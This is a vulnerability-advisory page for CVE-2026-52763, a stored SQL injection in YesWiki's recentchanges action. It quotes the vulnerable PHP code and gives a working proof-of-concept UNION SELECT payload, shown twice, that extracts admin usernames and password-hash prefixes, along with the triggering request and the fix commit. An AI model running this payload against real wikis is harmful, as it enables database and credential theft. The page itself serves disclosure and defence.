Skip to main content

YesWiki CVE-2026-52763

MEDIUM
SQL Injection (CWE-89)
2026-07-09 https://github.com/YesWiki/yeswiki GHSA-89v6-j5x6-cmj3
6.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
vuln.today AI
7.5 HIGH

Default install permits anonymous page saves (default_write_acl='*') with only a bypassable client-side hashcash check, warranting PR:N; no integrity or availability impact is demonstrated.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jul 09, 2026 - 21:46 vuln.today

DescriptionGitHub Advisory

Summary

The recentchanges action (actions/recentchanges.php) accepts a period argument from two disjoint parameter spaces: the URL query string ($_GET['period']) and the action invocation {{recentchanges period="..."}}. A whitelist at line 17 validates only the URL form against ['day','week','month']. The action-argument form takes the else branch at line 33 ($dateMin = $this->GetParameter('period')) with no validation, and the value flows into PageManager::getRecentlyChanged() (includes/services/PageManager.php:196), where it is interpolated into a WHERE time >= '...' ORDER BY time DESC clause without escaping or parameterization. UNION-based injection succeeds, the leaked rows render into the response page via actions/recentchanges.php:43,58 (ComposeLinkToPage($page['tag'])), so any visitor of the trigger page sees the exfiltrated data.

The vulnerability provides arbitrary read of the YesWiki database to anyone who can save the trigger page. On a default install (default_write_acl='*'), this includes anonymous users, subject to the hashcash JS check on the page-edit form. Once the trigger page is saved, every subsequent view fires the injection as the SQLi is stored. Stored SQL injection is reachable through the page-edit flow, with arbitrary database read.

Details

Two issues compose the vulnerability.

  1. actions/recentchanges.php line 33 reads the action argument and skips the whitelist.
php
   if (isset($_GET['period']) && in_array($_GET['period'], ['day', 'week', 'month'])) {
       switch ($_GET['period']) {
           case 'day':   $d = strtotime('-1 day');   $dateMin = date('Y-m-d H:i:s', $d); break;
           case 'week':  $d = strtotime('-1 week');  $dateMin = date('Y-m-d H:i:s', $d); break;
           case 'month': $d = strtotime('-1 month'); $dateMin = date('Y-m-d H:i:s', $d); break;
       }
   } else {
       $dateMin = $this->GetParameter('period');
   }

Wiki::GetParameter() (includes/YesWiki.php:895) reads $this->parameter[$key], which is populated from the {{action key=value}} argument list - disjoint from $_GET. The whitelist's if branch only runs when $_GET['period'] matches one of three exact values; in every other case the else branch reads the action argument with no validation, no escaping, no DateTime parse, no regex. The two parameter spaces are independent.

  1. In includes/services/PageManager.php, PageManager::getRecentlyChanged() interpolates the value into SQL.
php
   public function getRecentlyChanged($limit = 50, $minDate = ''): ?array
   {
       if (!empty($minDate)) {
           if ($pages = $this->dbService->loadAll(
               'select id, tag, time, user, owner from' . $this->dbService->prefixTable('pages')
               . "where latest = 'Y' and comment_on = '' and time >= '$minDate' order by time desc"
           )) {
               return $pages;
           }
       }
   }

$minDate is interpolated raw into the query and there is no $this->dbService->escape($minDate) and no parameter binding and no format check.

The default action ACL for recentchanges is * (includes/YesWiki.php:1100, GetModuleACL), so Performer::CheckModuleACL('recentchanges', 'action') returns true for everyone. The injection runs whenever a viewer reaches a page that embeds the action with a malicious period argument.

PoC

Default fresh install so default_write_acl='*'.

  1. place the SQLi payload on a page
{{recentchanges period="2000-01-01' UNION SELECT 9999 AS id, CONCAT('LEAK_', name, '_', SUBSTRING(password,1,32)) AS tag, NOW() AS time, name AS user, name AS owner FROM yeswiki_users WHERE name='AdminUser' -- "}}

The five UNION columns match the id, tag, time, user, owner projection that getRecentlyChanged selects. The tag column is rendered into the response as a hyperlink, exfiltrating the leaked data.

  1. anyone visits the page
http
GET /?<TriggerPage> HTTP/1.1
Host: target.example

The injected query executes server-side; the tag column is rendered into the page in actions/recentchanges.php:43,58 via ComposeLinkToPage($page['tag']).

Impact

Arbitrary read of any DB column the application's MySQL user can access.

AnalysisAI

Stored SQL injection in YesWiki's recentchanges action enables arbitrary read of the underlying MySQL database by any user who can save a wiki page - on default installations, this includes unauthenticated visitors. The payload is persisted as wiki page content and executes on every subsequent page load, leaking rows (including admin usernames and password hashes) rendered directly into the HTML response as hyperlinks. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft UNION-based SQL payload
Delivery
Solve hashcash JS challenge on edit form
Exploit
Save wiki page with malicious {{recentchanges period='...'}}
Install
Victim visits trigger page
C2
Unvalidated period value interpolated raw into SQL WHERE clause
Execute
UNION query extracts target DB rows
Impact
Exfiltrated credentials rendered as hyperlinks in page response

Vulnerability AssessmentAI

Exploitation Exploitation requires saving a YesWiki page that embeds the `{{recentchanges period="..."}}` action with a malicious `period` argument in the wiki action syntax - not via the URL query string, which is separately validated. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor CVSS of 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) correctly captures the network attack vector, low complexity, and high confidentiality impact, but PR:L likely overstates the real-world authentication barrier. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario On a default YesWiki installation, an unauthenticated attacker edits or creates a wiki page embedding `{{recentchanges period="2000-01-01' UNION SELECT 9999, CONCAT('LEAK_', name, '_', SUBSTRING(password,1,32)), NOW(), name, name FROM yeswiki_users WHERE name='AdminUser' -- "}}`, completing the hashcash JS challenge to save the page. From that moment forward, every visitor who loads the page causes the UNION query to fire server-side; the exfiltrated `tag` column - containing leaked admin credentials - is rendered as a hyperlink in the page HTML visible to all viewers. …
Remediation Apply the upstream fix available at commit `5da27474c3ee62270c8a6b9d7055d494cdbd38e5` (https://github.com/YesWiki/yeswiki/commit/5da27474c3ee62270c8a6b9d7055d494cdbd38e5); upstream fix available (commit), but a specifically tagged patched release version is not independently confirmed from available data - verify that a tagged release incorporating this commit exists before updating production systems. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-52763 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy